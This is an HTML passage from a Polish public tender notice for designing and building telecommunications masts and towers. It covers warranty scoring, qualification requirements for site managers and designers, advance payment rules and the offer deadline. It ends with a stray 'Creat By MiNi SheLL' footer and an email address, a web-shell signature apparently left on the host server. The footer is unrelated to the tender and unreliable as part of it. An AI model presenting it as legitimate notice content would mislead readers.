dnia odbioru końc.<br/>d)	Do celu wyboru najkorz. oferty będzie liczony okres gwarancji do 84 m-y.<br/>Jeżeli Wykonawca zaoferuje okres gwarancji dłuższy niż 84 m-ce, do wzoru zostanie podstawiony okres 84 m-cy, natomiast do umowy zostanie wpisany okres gwarancji zaoferowany przez Wykonawcę (np.: Wykonawca zaoferuje 86 m-cy gwarancji na roboty budowlane – do przel. będzie brany okres 84 m-cy, a do umowy wpisany okres 86 m-cy).<br/>e)	Zam. wymaga, aby gwarancja była podana w pełnych m-cach.<br/>f)	Zam. wymaga, aby okres rękojmi był równy okresowi zaofer. gwarancji na roboty bud.<br/>g)	Wyk. może zwiększać okres gwarancji w skokach co 1 m-c.<br/>h)	Błędne podanie okresu gwarancji np. 66,5 m-ca lub w innych jednostkach tyg. np.: 267 tyg., dniach Zam. przeliczy na okres m-czny i zaokrągli w dół. Przyjmując że m-c stanowi 30 dni lub 4 tyg. (tym samym, gdy Wyk. wpisze 66,5 m-ca - do przel. będzie brany okres 6 m-cy powyżej gwarancji min.; 267 tyg. - do przel. będzie brany okres 3 m-cy powyżej gw. Min.).<br/>i)	Podanie przez Wyk. krótszego okresu gwar. niż 60 m-cy na roboty bud., będzie potraktowane przez Zam. jako niezgodność oferty z dokumentami zamówienia, a oferta zostanie odrzucona na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp.<br/>j)	W przypadku braku wskazania długości gwar. przez Wyk, Zam. przyjmie, iż Wyk. udziela gwar. w wysokości min. wymag.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolności technicznej lub zawodowej:<br/>Zamawiający będzie dokonywał oceny zdolności technicznej lub zawodowej wykonawcy na podstawie minimalnych warunków dotyczących doświadczenia i kwalifikacji zawodowych zarówno samych wykonawców, jak i osób skierowanych przez wykonawcę do realizacji zamówienia.<br/>Zamawiający uzna, że wykonawca spełnia warunek dotyczący doświadczenia, jeżeli w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał co najmniej dwie roboty polegające na wykonaniu robót budowlanych:<br/>•	w zakresie budowy masztów powyżej 10 metrów i/lub wież powyżej 20 metrów na kwotę co najmniej 100.000,00 zł netto. <br/>Zamawiający uzna, że wykonawca spełnia warunek dotyczący kwalifikacji zawodowych, jeżeli Wykonawca dysponuje i skieruje do realizacji zamówienia: <br/>I.	Kierownika budowy posiadającego: <br/>- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, posiadającego uprawnienia budowlane w co najmniej ograniczonym zakresie. Ograniczenie zakresu uprawnień nie może dotyczyć zakresu robót występujących w przedmiotowym zadaniu;<br/>- co najmniej 5-letne doświadczenie zawodowe od uzyskania uprawnień w zakresie kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej lub równorzędnych uprawniających do kierowania robotami budowlanymi.<br/><br/>II. Kierownika robót posiadającego: <br/>- uprawnienia do kierowania robotami w specjalności telekomunikacyjnej, lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów, posiadającego uprawnienia budowlane w co najmniej ograniczonym zakresie. Ograniczenie zakresu uprawnień nie może dotyczyć zakresu robót występujących w przedmiotowym zadaniu;<br/>- co najmniej 2-letnie doświadczenie w pełnieniu funkcji kierownika robót telekomunikacyjnych od uzyskania uprawnień.<br/><br/>III. Kierownika robót posiadającego: <br/>- uprawnienia do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów, posiadającego uprawnienia budowlane w co najmniej ograniczonym zakresie. Ograniczenie zakresu uprawnień nie może dotyczyć zakresu robót występujących w przedmiotowym zadaniu;<br/>- co najmniej 2-letnie doświadczenie w pełnieniu funkcji kierownika robót elektrycznych od uzyskania uprawnień.<br/><br/>IV. Projektanta posiadającego uprawnienia budowlane do projektowania w specjalności konstrukcyjno-budowlanej w co najmniej ograniczonym zakresie, posiadającego:<br/>- co najmniej 3-letnie doświadczenie w projektowaniu od uzyskania uprawnień, posiadającego uprawnienia do projektowania w co najmniej ograniczonym zakresie. Ograniczenie zakresu uprawnień nie może dotyczyć robót występujących w przedmiotowym zadaniu.<br/>- w okresie ostatnich 7 lat przed upływem terminu składania ofert, jako projektant branży konstrukcyjnej zaprojektował co najmniej trzy budowy masztów o wysokości pow. 10 m, lub wież o wysokości pow. 20m.<br/><br/>V. Projektanta posiadającego uprawnienia budowlane do projektowania w specjalności architektonicznej wydane na podstawie obowiązujących przepisów prawa, tj. zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane, posiadającego uprawnienia do projektowania w co najmniej ograniczonym zakresie. Ograniczenie zakresu uprawnień nie może dotyczyć robót występujących w przedmiotowym zadaniu.<br/>VI. Projektanta posiadającego uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych tj. zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane, posiadającego uprawnienia do projektowania w co najmniej ograniczonym zakresie. Ograniczenie zakresu uprawnień nie może dotyczyć robót występujących w przedmiotowym zadaniu.<br/>VII. Projektanta posiadającego uprawnienia budowlane do projektowania w specjalności telekomunikacyjnej lub równoważne tj. zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane, posiadający uprawnienia do projektowania w co najmniej ograniczonym zakresie. Ograniczenie zakresu uprawnień nie może dotyczyć robót występujących w przedmiotowym zadaniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu na podstawie art. 125 ust. 1 ustawy Pzp, aktualnego na dzień składania ofert – załącznik nr 4 do SWZ.<br/>Dokumenty składane na wezwanie Zamawiającego Wykonawca składa w terminie przez niego wyznaczonym: <br/>Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy w zakresie podstaw wykluczenia z postępowania oraz art. 7 ust. 1 pkt 1-3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. poz. 835) – załącznik nr 9 do SWZ.<br/>Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt. 5 ustawy o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r o ochronie konkurencji i konsumentów (Dz.U. z 2020 r. poz.1076 i 1086) z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 10 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz wykonanych robót wraz z podaniem ich wartości, rodzaju, daty, miejsca wykonywania oraz podmiotów, na rzecz których roboty te zostały wykonane wraz z dowodami potwierdzającymi należyte wykonanie tych robót – załącznik nr 6 do SWZ.<br/>Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług i robót, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – załącznik nr 7 do SWZ.<br/>Do załącznika nr 7 należy dołączyć kserokopie uprawnień do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności określonych w Sekcji VII pkt 1.2 SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>W przypadku wspólnego ubiegania się o zamówienie Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>Do oferty należy załączyć pełnomocnictwa do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia, ewentualnie umowę o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo.<br/>Oryginał pełnomocnictwa opatrzony kwalifikowanym podpisem elektronicznym przez wykonawców ubiegających się<br/>wspólnie o udzielenie zamówienia lub kopia potwierdzona notarialnie, opatrzona kwalifikowanym podpisem elektronicznym<br/>przez notariusza, powinny być załączone do oferty i zawierać w szczególności wskazanie:<br/>a) postępowania o zamówienie publiczne, którego dotyczą,<br/>b) wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem<br/>adresu siedziby,<br/>c) ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>Wszelka korespondencja prowadzona będzie przez zamawiającego wyłącznie z wyznaczonym pełnomocnikiem.<br/>Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie.<br/>W przypadku wspólnego ubiegania się przez Wykonawców o udzielenie zamówienia dokumenty i oświadczenia wskazane w<br/>sekcji VIII pkt. 1.1.1, 1.1.2 oraz pkt. 1.2.1-1.2.3 składa każdy z Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> 1.	Zamawiający dopuszcza udzielenie Wykonawcy zaliczek:<br/>a)	na roboty budowlane<br/>b)	na zakup materiałów budowlanych niezbędnych do realizacji przedmiotu umowy,<br/> a wynikających z zestawienia materiałów kosztorysu ofertowego.<br/>2.	Zamawiający może udzielić zaliczki wyłącznie na pisemny wniosek Wykonawcy na zasadach określonych poniżej.<br/>3.	Zaliczki mogą być udzielane wyłącznie na roboty objęte odbiorami częściowymi.<br/>4.	Wykonawca we wniosku o przydzielenie zaliczki wskaże w oparciu o kosztorys ofertowy zakres prac lub /i wykaz materiałów który pokryje z udzielonej zaliczki oraz termin ich wykonania, a także formę zabezpieczenia ich wykonania.<br/>5.	Warunkiem przyznania zaliczki jest wniesienie 100 % zabezpieczenia jej wykonania.<br/>6.	Zabezpieczenie zaliczki może być wniesione w formie:<br/>a)	gwarancji bankowej;<br/>b)	gwarancji ubezpieczeniowej;<br/>c)	poręczenia udzielanego przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości; <br/>d)	w wekslach z poręczeniem wekslowym banku lub spółdzielczej kasy oszczędnościowo- kredytowej; <br/>e)	przez ustanowienie zastawu na papierach wartościowych emitowanych przez Skarb Państwa lub jednostkę samorządu terytorialnego;<br/>f) przez ustanowienie zastawu rejestrowanego na zasadach określonych w ustawie z dnia 6 grudnia 1996r. O zastawie rejestrowym i rejestrze zastawów (Dz.U. z 2018 r. Poz. 2017).<br/>7.	Zamawiający zwróci lub zwolni zabezpieczenie należytego wykonania zaliczki w terminie do 30 dni licząc od dnia jej rozliczenia.<br/>8.	W przypadku zlecenia części robót na podstawie zaliczki do wykonania przez podwykonawcę, Wykonawca zobowiązany jest wskazać we wniosku jaka część robót (rzeczowo - finansowa) będzie realizowana przez podwykonawcę.<br/>9.	Zamawiający przyznaje lub odmawia przyznania zaliczki w formie pisemnej w terminie 7 dni od daty wpłynięcia wniosku o jej przyznanie.<br/>10.	Do rozliczania zaliczek mają zastosowanie zapisy w § 13 ust 4 oraz § 14 ust 2 niniejszej umowy.<br/>11.	Zamawiającemu w każdym czasie realizacji robót z zaliczki przysługuje prawo do żądania rozliczenia zaliczki w terminie nie dłuższym niż 30 dni.<br/>12.	W przypadku braku rozliczenia zaliczki w terminie wynikającym z ust 12 Zamawiającemu przysługuje prawo wypowiedzenia umowy z przyczyn leżących po stronie Wykonawcy<br/>13.	W przypadku wystąpienia z wnioskiem o kolejną transzę zaliczki, Zamawiający może jej udzielić wyłącznie po rozliczeniu przyznanej już transzy.<br/>14.	Wykonawca zobowiązany jest do wystawienia faktury VAT potwierdzającej otrzymanie zaliczki na zakres objęty wnioskiem, o którym mowa w § 20 ust 5, w terminie 7 dni od daty otrzymania zaliczki.<br/>15.	Otrzymanie zaliczki wstrzymuje prawo Wykonawcy do wystawienia faktur częściowych za wykonane roboty do dnia rozliczenia się z zaliczki.<br/>Odbiór końcowy robót będzie możliwy dopiero po całkowitym rozliczeniu się Wykonawcy z przyznanych zaliczek. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość wprowadzenia zmian postanowień zawartej umowy, zgodnie z art. 455 ustawy PZP. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-11-20 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://slaska-policja.eb2b.com.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-11-20 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-12-19</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin realizacji zadania (zadanie nr 1 i zadanie nr 2) - do 7 miesięcy od dnia podpisania umowy (w tym dokumentacja projektowa do 3 miesięcy od dnia podpisania umowy).<br/>Poza możliwością unieważnienia postępowania o udzielenie zamówienia na podstawie art. 255 ustawy Pzp, zamawiający zastrzega możliwość unieważnienia postępowania przed upływem terminu składania ofert, jeżeli wystąpią okoliczności powodujące, że dalsze prowadzenie postepowania jest nieuzasadnione oraz zgodnie z art. 257 Pzp.<br/>Zamawiający może unieważnić postępowanie o udzielenie zamówienia, jeżeli środki, które Zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały mu przyznane.

Creat By MiNi SheLL
Email: jattceo@gmail.com